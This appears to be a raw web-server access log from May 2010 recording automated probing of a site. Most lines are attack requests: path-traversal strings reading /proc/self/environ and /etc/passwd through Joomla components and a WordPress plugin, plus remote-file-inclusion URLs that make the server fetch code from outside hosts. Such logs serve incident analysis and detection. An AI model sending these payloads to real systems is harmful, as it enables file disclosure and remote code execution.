109.71.41.45 - - [30/May/2010:04:03:16 -0500] "GET /?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
203.72.226.120 - - [30/May/2010:04:04:23 -0500] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:04:24 -0500] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.805"
109.71.41.45 - - [30/May/2010:04:05:02 -0500] "GET /logs/?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:05:03 -0500] "GET /?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
121.78.118.123 - - [30/May/2010:04:06:04 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:04:06:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:04:06:06 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
109.71.41.45 - - [30/May/2010:04:06:29 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:06:29 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:06:30 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:06:30 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
216.67.243.42 - - [30/May/2010:04:06:39 -0500] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.810"
216.67.243.42 - - [30/May/2010:04:06:39 -0500] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.810"
85.92.87.175 - - [30/May/2010:04:06:58 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:06:59 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
58.230.162.220 - - [30/May/2010:04:07:31 -0500] "GET /logs//skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:04:07:31 -0500] "GET //skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:04:07:31 -0500] "GET /logs/access_log.1271462400//skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.92.87.175 - - [30/May/2010:04:07:33 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:07:33 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:07:37 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:07:37 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.195.112.180 - - [30/May/2010:04:08:15 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [30/May/2010:04:08:16 -0500] "GET /logs/access_log.1217635200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.230.162.220 - - [30/May/2010:04:08:23 -0500] "GET /logs//skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:04:08:23 -0500] "GET /logs/access_log.1271462400//skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:04:08:23 -0500] "GET //skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.38.67.248 - - [30/May/2010:04:08:43 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
84.38.67.248 - - [30/May/2010:04:08:43 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
80.65.166.74 - - [30/May/2010:04:09:33 -0500] "GET /logs/access_log.1272585600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:04:09:55 -0500] "GET /logs/access_log.1271548800//skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:04:10:05 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gbdata.co.uk/images/zd1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:04:10:05 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gbdata.co.uk/images/zd1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:04:10:05 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gbdata.co.uk/images/zd1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.55.224.242 - - [30/May/2010:04:10:12 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.224.242 - - [30/May/2010:04:10:12 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.224.242 - - [30/May/2010:04:10:12 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
58.230.162.220 - - [30/May/2010:04:10:48 -0500] "GET /logs/access_log.1271548800//skin/ggerzer_diary/error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.13.90 - - [30/May/2010:04:10:57 -0500] "GET /logs/access_log.1191628800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [30/May/2010:04:11:18 -0500] "GET /costume HTTP/1.1" 301 331 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [30/May/2010:04:11:20 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.38.67.248 - - [30/May/2010:04:13:52 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.813"
84.38.67.248 - - [30/May/2010:04:13:53 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.813"
84.38.67.248 - - [30/May/2010:04:14:52 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.813"
84.38.67.248 - - [30/May/2010:04:14:53 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.813"
207.46.199.163 - - [30/May/2010:04:16:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.163 - - [30/May/2010:04:16:42 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.163 - - [30/May/2010:04:16:42 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.184 - - [30/May/2010:04:16:57 -0500] "GET /logs/access_log.1197763200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.43.66 - - [30/May/2010:04:21:01 -0500] "GET /logs/?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:04:21:01 -0500] "GET /?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
95.211.18.156 - - [30/May/2010:04:21:11 -0500] "GET /logs/?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:04:21:11 -0500] "GET /?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.92.87.175 - - [30/May/2010:04:21:23 -0500] "GET /logs/?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:21:23 -0500] "GET /?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.195.112.180 - - [30/May/2010:04:23:52 -0500] "GET /logs/access_log.1271289600 HTTP/1.0" 200 669492 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.198 - - [30/May/2010:04:29:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.41.235.46 - - [30/May/2010:04:34:27 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:04:34:28 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
109.71.41.45 - - [30/May/2010:04:34:31 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:34:31 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
80.233.172.42 - - [30/May/2010:04:34:37 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:04:34:37 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [30/May/2010:04:34:42 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:04:34:42 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:04:34:44 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:04:34:44 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
85.92.87.175 - - [30/May/2010:04:34:45 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:34:46 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
193.41.235.46 - - [30/May/2010:04:34:49 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
85.92.87.175 - - [30/May/2010:04:34:49 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
193.41.235.46 - - [30/May/2010:04:34:49 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
85.92.87.175 - - [30/May/2010:04:34:49 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
109.71.41.45 - - [30/May/2010:04:34:55 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:34:58 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
80.233.172.42 - - [30/May/2010:04:35:03 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:04:35:03 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
85.92.87.175 - - [30/May/2010:04:35:34 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
85.92.87.175 - - [30/May/2010:04:35:34 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
193.41.235.46 - - [30/May/2010:04:35:40 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:04:35:40 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
89.145.108.230 - - [30/May/2010:04:35:44 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:04:35:44 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:04:35:50 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:04:35:50 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
109.71.41.45 - - [30/May/2010:04:36:24 -0500] "GET /logs/*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:36:24 -0500] "GET /*.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
94.198.96.3 - - [30/May/2010:04:36:33 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:36:33 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
74.124.198.60 - - [30/May/2010:04:36:59 -0500] "GET /logs/access_log.1273017600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:36:59 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:36:59 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:37:00 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:37:00 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:37:00 -0500] "GET /logs/access_log.1273017600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:37:06 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:37:06 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:04:37:06 -0500] "GET /logs/access_log.1273017600%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
81.23.236.82 - - [30/May/2010:04:37:11 -0500] "GET /logs/.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:37:11 -0500] "GET /.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:37:14 -0500] "GET /logs/.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:37:14 -0500] "GET /.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.805"
207.46.204.238 - - [30/May/2010:04:37:26 -0500] "GET /logs/access_log.1160697600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.131.77.225 - - [30/May/2010:04:37:30 -0500] "GET /logs/.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.131.77.225 - - [30/May/2010:04:37:30 -0500] "GET /.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.834"
209.216.201.8 - - [30/May/2010:04:38:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
94.198.96.3 - - [30/May/2010:04:38:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:04:39:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
72.10.166.186 - - [30/May/2010:04:39:10 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:04:39:10 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:04:39:10 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.10.166.186 - - [30/May/2010:04:39:10 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.18.167.170 - - [30/May/2010:04:39:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
209.216.201.8 - - [30/May/2010:04:40:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
94.198.96.3 - - [30/May/2010:04:41:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:04:42:01 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
67.18.167.170 - - [30/May/2010:04:42:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
81.23.236.82 - - [30/May/2010:04:42:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
